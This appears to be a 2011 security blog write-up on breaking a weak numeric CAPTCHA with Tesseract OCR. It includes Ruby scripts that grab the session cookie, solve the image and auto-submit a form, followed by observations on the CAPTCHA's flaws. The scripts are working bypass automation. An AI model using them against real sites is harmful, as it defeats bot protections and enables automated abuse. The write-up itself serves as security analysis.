Saturday, March 19, 2011

Breaking A Weak CAPTCHA implementation

A while back I came across a web application that used a captcha to prevent automated form submissions. The captcha was weak and could be solved easily. Below I summarize the steps I followed and provide the sample Ruby scripts that were used to automate form submissions. The page names, form fields, etc. are fictitious and do not reflect the exact application data or behavior.


So let's get started. Here is one sample captcha obtained from the website.




My first thought was to try the free OCR-to-text conversion service provided by the guys at Free-Ocr. I uploaded a few captchas to the website and it successfully solved almost all of them. One solved captcha is shown below.




Now I knew that the captcha could be solved, and I needed a way to automate the process of solving it. I turned to Tesseract to do that for me. Tesseract enjoys the reputation of being one of the most accurate open source OCR engines available.


Tesseract was downloaded and installed on a Windows box. The page requiring captcha input was sourcing captchas from a PHP script on the web server. Let's say its path is http://www.test.com/get_captcha.php. The following script downloaded a sample captcha, stored it on the local file system, and then solved it.


require 'net/http'

tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com', 80)

# Download a new captcha
r = q.get("/get_captcha.php")

# Save the raw image bytes; f.write is used because f.puts can append a newline
File.open("captcha.bmp", 'wb') do |f|
  f.write r.body
end

# Solve the captcha; Tesseract stores its output in captcha.txt
system("#{tesseract} captcha.bmp captcha")

Most of the sourced captchas could be successfully solved using the script above. Good! 
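
As a rough sketch of how the solving step could be wrapped for reuse, the helper below calls the Tesseract command line with the same two arguments used above (image file and output base name) and returns the recognized text. The name solve_captcha and the runner parameter are my own assumptions for illustration, not part of the original script or of Tesseract.

```ruby
# Hypothetical wrapper around the Tesseract CLI call used in the script above:
#   tesseract <image> <output base>   (text ends up in "<output base>.txt")
# `runner` defaults to Kernel#system; it is injectable only so the helper
# can be exercised on a machine without Tesseract installed.
def solve_captcha(tesseract, image_path, output_base, runner: method(:system))
  # Passing arguments separately avoids shell interpolation of the paths.
  ok = runner.call(tesseract, image_path, output_base)
  return nil unless ok

  text_file = "#{output_base}.txt"
  return nil unless File.exist?(text_file)

  # OCR output usually carries trailing whitespace; an empty result
  # is treated as a failed solve.
  text = File.read(text_file).strip
  text.empty? ? nil : text
end
```

With Tesseract installed at the path used earlier, a call could look like solve_captcha('C:\Tesseract-OCR\tesseract.exe', 'captcha.bmp', 'captcha'). A nil result means the captcha should be discarded and a fresh one requested.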

The next obvious step was to automate the entire process of form submission. The application used PHPSESSIONID to associate captchas with sessions. http://www.test.com/home.php issued the PHPSESSIONID, and the same session value was sent to /get_captcha.php to retrieve a captcha. To automate the process, the following steps were required:
  1. GET /home.php page and capture the value of PHPSESSIONID.
  2. Retrieve a captcha by accessing /get_captcha.php while using the captured PHPSESSIONID.
  3. Solve the captcha locally.
  4. POST the form fields along with PHPSESSIONID and the captcha value.
Adding a few more lines to the script above served our purpose. The final script looked like this:


require 'net/http'

tesseract = 'C:\Tesseract-OCR\tesseract.exe'
q = Net::HTTP.new('www.test.com', 80)

# Get the home page and capture the PHPSESSIONID value from the Set-Cookie header
r = q.get("/home.php")
r['set-cookie'] =~ /PHPSESSIONID=([^;]+)/
hdr = {'Cookie' => "PHPSESSIONID=#{$1}"}

# Get a captcha associated with the valid PHPSESSIONID and solve it
r = q.get("/get_captcha.php", hdr)
File.open("captcha.bmp", 'wb') do |f|
  f.write r.body   # f.write keeps the image bytes intact; f.puts can append a newline
end
system("#{tesseract} captcha.bmp captcha")

# Retrieve the captcha value and POST the form details along with the valid PHPSESSIONID
captcha = File.read("captcha.txt").strip
q.post('/save_details.php', "fname=gursev&lname=kalra&captcha=#{captcha}", hdr)
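
The final script assumes that the Set-Cookie header is always present and that the OCR output is safe to paste into the POST body. A slightly more defensive version of those two steps might look like the sketch below. The helper names extract_session_id and build_form_body are hypothetical. The field names are the fictitious ones used above.

```ruby
require 'uri'

# Hypothetical helper: pull the PHPSESSIONID value out of a Set-Cookie header.
# Returns nil when the header is missing or does not carry that cookie.
def extract_session_id(set_cookie)
  return nil if set_cookie.nil?

  match = set_cookie.match(/PHPSESSIONID=([^;,\s]+)/)
  match && match[1]
end

# Hypothetical helper: build the POST body with URL encoding, so that stray
# characters in the OCR output cannot break the form parameters.
def build_form_body(captcha)
  URI.encode_www_form('fname' => 'gursev', 'lname' => 'kalra', 'captcha' => captcha)
end
```

In the script, hdr would then be built only when extract_session_id(r['set-cookie']) returns a value, and the body passed to q.post would come from build_form_body(captcha).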



Further Analysis:
The captcha implementation appeared to have more issues. During the analysis, around 100 captchas were solved and their values analyzed. Here are the observations:
  1. Captchas contained only numerals, which greatly reduces the number of possible combinations.
  2. Out of 100 captchas, around 4 duplicates were identified. That's around 4% of the total captchas issued.
  3. Captchas had an uneven character distribution, with 4s and 5s making up the largest share of captcha characters. The distribution formed a bell curve with a peak at 4 and 5.
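
The observations above can be reproduced with a few lines of Ruby once the solved values are collected in an array. The snippet below is only a sketch: the sample values are made up, the helper names are hypothetical, and the captcha length of 4 is an assumption, since the actual length is not recorded here.

```ruby
# Number of values that repeat an earlier value in the list.
def duplicate_count(values)
  values.size - values.uniq.size
end

# How often each character appears across all captcha values,
# returned as a hash sorted by character.
def digit_histogram(values)
  counts = Hash.new(0)
  values.each { |v| v.each_char { |c| counts[c] += 1 } }
  counts.sort.to_h
end

# Number of possible captchas of a given length over a given alphabet.
def keyspace(alphabet_size, length)
  alphabet_size**length
end

# Made-up sample values standing in for the solved captchas.
sample = %w[4521 3456 4521 5540]

puts "duplicates: #{duplicate_count(sample)}"
digit_histogram(sample).each { |digit, n| puts "#{digit} #{'*' * n}" }

# Assumed length of 4: digits only versus digits plus lowercase letters.
puts "numeric keyspace:      #{keyspace(10, 4)}"
puts "alphanumeric keyspace: #{keyspace(36, 4)}"
```

Printing the histogram as rows of asterisks makes a skew toward particular digits easy to spot. The keyspace comparison shows how much a digits-only alphabet shrinks the search space for any fixed length.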